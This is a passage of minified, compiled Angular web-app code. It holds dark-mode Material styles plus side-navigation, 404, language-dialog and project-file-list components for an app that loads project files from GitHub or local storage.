.mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-accent[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-label.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-keyboard-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled), .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] .mat-tab-link.cdk-program-focused[_ngcontent-%COMP%]:not(.mat-tab-disabled){background-color:#ffcdd24d}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%]{background-color:#f44336}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-label.mat-tab-disabled[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-tab-link.mat-tab-disabled[_ngcontent-%COMP%]{color:#fff6}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before, .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-focus-indicator[_ngcontent-%COMP%]:before{border-color:#fff}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination-disabled[_ngcontent-%COMP%] .mat-tab-header-pagination-chevron[_ngcontent-%COMP%]{border-color:#fff;opacity:.4}.darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-group.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-link-container[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-tab-nav-bar.mat-background-warn[_ngcontent-%COMP%] > .mat-tab-header-pagination[_ngcontent-%COMP%] .mat-ripple-element[_ngcontent-%COMP%]{background-color:#fff;opacity:.12}.darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%]{background:#212121;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-toolbar.mat-primary[_ngcontent-%COMP%]{background:#2196f3;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-toolbar.mat-accent[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-toolbar.mat-warn[_ngcontent-%COMP%]{background:#f44336;color:#fff}.darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-form-field-underline[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-focused[_ngcontent-%COMP%] .mat-form-field-ripple[_ngcontent-%COMP%]{background-color:currentColor}.darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-focused[_ngcontent-%COMP%] .mat-form-field-label[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-select-value[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-form-field.mat-focused[_ngcontent-%COMP%] .mat-select-arrow[_ngcontent-%COMP%]{color:inherit}.darkMode[_ngcontent-%COMP%] .mat-toolbar[_ngcontent-%COMP%] .mat-input-element[_ngcontent-%COMP%]{caret-color:currentColor}.darkMode[_ngcontent-%COMP%] .mat-tooltip[_ngcontent-%COMP%]{background:rgba(97,97,97,.9)}.darkMode[_ngcontent-%COMP%] .mat-tree[_ngcontent-%COMP%]{background:#424242}.darkMode[_ngcontent-%COMP%] .mat-tree-node[_ngcontent-%COMP%], .darkMode[_ngcontent-%COMP%] .mat-nested-tree-node[_ngcontent-%COMP%]{color:#fff}.darkMode[_ngcontent-%COMP%] .mat-snack-bar-container[_ngcontent-%COMP%]{color:#000000de;background:#fafafa;box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.darkMode[_ngcontent-%COMP%] .mat-simple-snackbar-action[_ngcontent-%COMP%]{color:inherit}html[_ngcontent-%COMP%], body[_ngcontent-%COMP%]{margin:0;padding:0;height:100%;font-family:Arial,Helvetica,sans-serif}.website-container[_ngcontent-%COMP%]{height:100%;display:flex;flex-direction:column}.drawer-container[_ngcontent-%COMP%]{width:100%;height:100%;background-color:#0000;margin-bottom:21px}.messages-info[_ngcontent-%COMP%]{color:#fff;font-weight:700}.messages-success[_ngcontent-%COMP%]{background-color:#35d10de6!important;color:#fff;font-weight:700}.messages-warning[_ngcontent-%COMP%]{background-color:#eeca00e6!important;color:#fff;font-weight:700}.messages-error[_ngcontent-%COMP%]{background-color:#ca1c1ce6!important;color:#fff;font-weight:700}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.mat-tab-body-wrapper[_ngcontent-%COMP%]{height:100%}.mat-tooltip[_ngcontent-%COMP%]{font-size:small!important;background-color:gray!important}.expansion-panel-headers-align[_ngcontent-%COMP%] .mat-expansion-panel-header-title[_ngcontent-%COMP%], .expansion-panel-headers-align[_ngcontent-%COMP%] .mat-expansion-panel-header-description[_ngcontent-%COMP%]{flex-basis:0}.expansion-panel-headers-align[_ngcontent-%COMP%] .mat-expansion-panel-header-description[_ngcontent-%COMP%]{justify-content:space-between;align-items:center}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-flex[_ngcontent-%COMP%]{padding:.5em .5em 0!important}.mat-form-field-appearance-fill[_ngcontent-%COMP%] .mat-form-field-infix[_ngcontent-%COMP%]{padding:.25em 0 .5em!important}.mat-form-field-wrapper[_ngcontent-%COMP%]{padding-bottom:10px!important}.mat-form-field-underline[_ngcontent-%COMP%]{bottom:10px!important}.mat-menu-panel[_ngcontent-%COMP%]{min-height:35px!important} .mat-menu-content{padding-top:0!important;padding-bottom:0!important}.mat-menu-item[_ngcontent-%COMP%], .mat-option[_ngcontent-%COMP%]{line-height:35px!important;height:35px!important}.status-bar[_ngcontent-%COMP%]{position:fixed;width:100%;bottom:0;left:0;height:22px;font-size:smaller;color:#fff;border-top-style:solid;border-color:#fff;border-width:0px;z-index:99999}button[_ngcontent-%COMP%]{height:22px!important;border-radius:2px;bottom:1px}.statusBtn[_ngcontent-%COMP%]{width:auto;font-size:14px!important;line-height:22px!important}.statusBtn[_ngcontent-%COMP%]:hover{background-color:#ffffff26!important}.iconBtn[_ngcontent-%COMP%]{height:22px!important;line-height:22px!important;transform:scale(.68)}.buttonAsText[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:small;color:#fff}']}),t})();function ict(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(V().OpenGitHubUrl())}),s(1,"\n "),it(2,"fa-icon",24),s(3,"\n "),m(4,"span"),s(5),u(),s(6,"\n "),u()}if(2&t){const e=V();g(2),F("icon",e.faCodeBranch),g(3),ct("",e.dataService.UserAccount," (GitHub)")}}function act(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(V().theme.SetDarkMode(!1))}),s(1,"\n "),m(2,"mat-icon"),s(3,"brightness_5"),u(),s(4,"\n "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n "),u()}2&t&&(g(6),ke(re(7,1,"side-nav.lightMode")))}function nct(t,a){if(1&t){const e=Ye();m(0,"button",17),he("click",function(){return be(e),Me(V().theme.SetDarkMode(!0))}),s(1,"\n "),m(2,"mat-icon"),s(3,"bedtime"),u(),s(4,"\n "),m(5,"span"),s(6),oe(7,"translate"),u(),s(8,"\n "),u()}2&t&&(g(6),ke(re(7,1,"side-nav.darkMode")))}let _f=(()=>{class t{constructor(e,i,n,r,c,d,T){this.theme=e,this.localization=i,this.locStorage=n,this.dataService=r,this.messagesService=c,this.router=d,this.dialog=T,this.selectedRoute="",this.sameRoute=new Tt,this.faCodeBranch=Z5}ngAfterViewInit(){this.setSelectedClass(this.theme.IsDarkMode),this.theme.ThemeChanged.subscribe(e=>this.setSelectedClass(e))}IsSelected(e,i=!1){return e==this.selectedRoute&&this.theme.IsDarkMode==i}IsHoveredOrSelected(e,i=!1){return this.IsSelected(e,i)||e==this.hovered&&this.theme.IsDarkMode==i}ChangeLanguage(e){this.localization.Locale=e}Clear(){let e=()=>{this.locStorage.Clear(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}ResetLayout(){let e=()=>{this.locStorage.ResetLayout(),window.location.reload()};this.dataService.HasUnsavedChanges?this.dialog.OpenUnsavedChangesDialog().subscribe(i=>{i?this.dataService.OnSave().then(()=>e()):e()}):e()}OpenCookieConsent(){this.dialog.OpenCookieConsentDialog()}OpenGitHubUrl(){window.open(this.dataService.UserURL,"_blank")}OpenYouTubePlaylist(){window.open("https://www.youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","_blank")}OpenGlossary(){this.dialog.OpenGlossaryDialog()}OnMouseEnter(e){this.hovered=e}OnMouseLeave(){this.hovered=""}OnClick(e){e==this.router.url?this.sameRoute.emit():this.router.navigate([e])}setSelectedClass(e){if(""!=this.selectedRoute){let i=document.getElementsByClassName("sidenav-icon-button");for(let n=0;n{class t{constructor(e){this.theme=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa))},t.\u0275cmp=Wt({type:t,selectors:[["app-page-not-found"]],decls:19,vars:4,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],[2,"width","100%","height","100%"],[2,"text-align","center"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n "),m(2,"mat-drawer-container",1),s(3,"\n "),m(4,"mat-drawer",2),s(5,"\n "),it(6,"app-side-nav",3),s(7,"\n "),u(),s(8,"\n\n "),m(9,"mat-drawer-content"),s(10,"\n "),m(11,"h1",4),s(12,"404 - Page not found"),u(),s(13,"\n "),u(),s(14,"\n "),u(),s(15,"\n "),it(16,"app-status-bar"),s(17,"\n"),u(),s(18,"\n")),2&e&&(g(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode))},dependencies:[_u,gu,Nd,pf,_f],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}"]}),t})(),rct=(()=>{class t{constructor(e,i){this.translateService=e,this.locStorage=i}ngOnInit(){}ChangeLanguage(e){this.translateService.use(e),this.locStorage.Set(si.LANGUAGE,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Sn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-language-dialog"]],decls:14,vars:0,consts:[["mat-dialog-title",""],["align","center"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",3,"click"],["mat-button","","mat-dialog-close","",3,"click"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1,"Hi \u{1f44b}\u{1f3fc}"),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n Choose your language \u{1f310}\n"),u(),s(5,"\n"),m(6,"mat-dialog-actions",1),s(7,"\n "),m(8,"button",2),he("click",function(){return i.ChangeLanguage("en")}),s(9,"Welcome!"),u(),s(10,"\n "),m(11,"button",3),he("click",function(){return i.ChangeLanguage("de")}),s(12,"Willkommen!"),u(),s(13,"\n"),u())},dependencies:[da,vm,Am,Tm,Em]}),t})();function sct(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.ExchangeConfig(r))}),s(1),u()}if(2&t){const e=a.$implicit;g(1),ke(e.name)}}function cct(t,a){if(1&t&&(m(0,"div",43),s(1),oe(2,"translate"),it(3,"br"),s(4,"\n "),u()),2&t){const e=V(2);g(1),za("\n ",re(2,2,"pages.home.CurrentProject"),": ",e.dataService.SelectedFile.name,"\n ")}}function lct(t,a){if(1&t){const e=Ye();m(0,"button",44),he("click",function(){return be(e),Me(V(2).dataService.OnNewProject())}),s(1,"\n "),m(2,"mat-icon",45),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()}2&t&&(g(4),ct("\n ",re(5,1,"pages.home.createProject"),"\n "))}function dct(t,a){1&t&&(m(0,"button",46),s(1,"\n "),m(2,"mat-icon",45),s(3,"add_circle"),u(),s(4),oe(5,"translate"),u()),2&t&&(V(),F("matMenuTriggerFor",Ti(131)),g(4),ct("\n ",re(5,2,"pages.home.createProject"),"\n "))}function mct(t,a){if(1&t){const e=Ye();m(0,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OnNewProject(r))}),s(1,"\n "),m(2,"mat-icon"),s(3),u(),s(4,"\n "),m(5,"span"),s(6),u(),s(7,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);g(3),ke(i.GetFileIcon(e)),g(3),ke(e.name)}}function uct(t,a){1&t&&(m(0,"mat-icon",53),oe(1,"translate"),s(2,"edit_off"),u()),2&t&&at("matTooltip",re(1,1,"pages.home.notWritable"))}function hct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",47),s(3,"\n "),m(4,"mat-icon",48),oe(5,"translate"),s(6,"cloud_queue"),u(),s(7,"\n "),m(8,"button",40),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n "),m(11,"span",49),s(12),u(),s(13," \n "),ne(14,uct,3,3,"mat-icon",50),s(15,"\n "),m(16,"button",51),oe(17,"translate"),s(18,"\n "),m(19,"mat-icon"),s(20,"more_vert"),u(),s(21,"\n "),u(),s(22,"\n "),m(23,"mat-menu",null,52),s(25,"\n "),m(26,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OpenRepo(r))}),s(27,"\n "),m(28,"mat-icon"),s(29,"open_in_new"),u(),s(30,"\n "),m(31,"span"),s(32),oe(33,"translate"),u(),s(34,"\n "),u(),s(35,"\n "),m(36,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.DeleteFile(r))}),s(37,"\n "),m(38,"mat-icon"),s(39,"delete"),u(),s(40,"\n "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n "),u(),s(45,"\n "),u(),s(46,"\n "),u(),s(47,"\n "),Mt()}if(2&t){const e=a.$implicit,i=Ti(24),n=V(2);g(4),at("matTooltip",re(5,9,"pages.home.storedOnline")),g(5),ke(e.name),g(2),at("matTooltip",n.GetRepoName(e)),g(1),ct("in ",n.CutName(n.GetRepoName(e)),""),g(2),F("ngIf",n.IsProtected(e)),g(2),at("matTooltip",re(17,11,"general.More")),F("matMenuTriggerFor",i),g(16),ke(re(33,13,"general.openInNew")),g(10),ke(re(43,15,"general.Delete"))}}function fct(t,a){if(1&t){const e=Ye();m(0,"mat-paginator",54),he("page",function(n){return be(e),Me(V(2).pageGHProjectIndex=n.pageIndex)}),s(1," "),u()}if(2&t){const e=V(2);F("length",e.dataService.AvailableGHProjects.length)("pageSize",e.pageProjectSize)("hidePageSize",!0)}}function pct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"div",47),s(3,"\n "),m(4,"mat-icon",48),oe(5,"translate"),s(6,"file_present"),u(),s(7,"\n "),m(8,"button",40),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.OnLoadFile(r))}),s(9),u(),s(10,"\n "),m(11,"span",49),s(12),u(),s(13,"\n "),m(14,"button",51),oe(15,"translate"),s(16,"\n "),m(17,"mat-icon"),s(18,"more_vert"),u(),s(19,"\n "),u(),s(20,"\n "),m(21,"mat-menu",null,55),s(23,"\n "),m(24,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.RemoveFSFile(r))}),s(25,"\n "),m(26,"mat-icon"),s(27,"remove"),u(),s(28,"\n "),m(29,"span"),s(30),oe(31,"translate"),u(),s(32,"\n "),u(),s(33,"\n "),m(34,"button",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).dataService.DeleteFile(r))}),s(35,"\n "),m(36,"mat-icon"),s(37,"delete"),u(),s(38,"\n "),m(39,"span"),s(40),oe(41,"translate"),u(),s(42,"\n "),u(),s(43,"\n "),u(),s(44,"\n "),u(),s(45,"\n "),Mt()}if(2&t){const e=a.$implicit,i=Ti(22),n=V(2);g(4),at("matTooltip",re(5,8,"pages.home.storedOffline")),g(5),ke(n.dataService.GetFileName(e.path)),g(2),at("matTooltip",n.dataService.GetFilePath(e.path)),g(1),ct("in ",n.CutName(n.dataService.GetFilePath(e.path)),""),g(2),at("matTooltip",re(15,10,"general.More")),F("matMenuTriggerFor",i),g(16),ke(re(31,12,"general.Remove")),g(10),ke(re(41,14,"general.Delete"))}}function 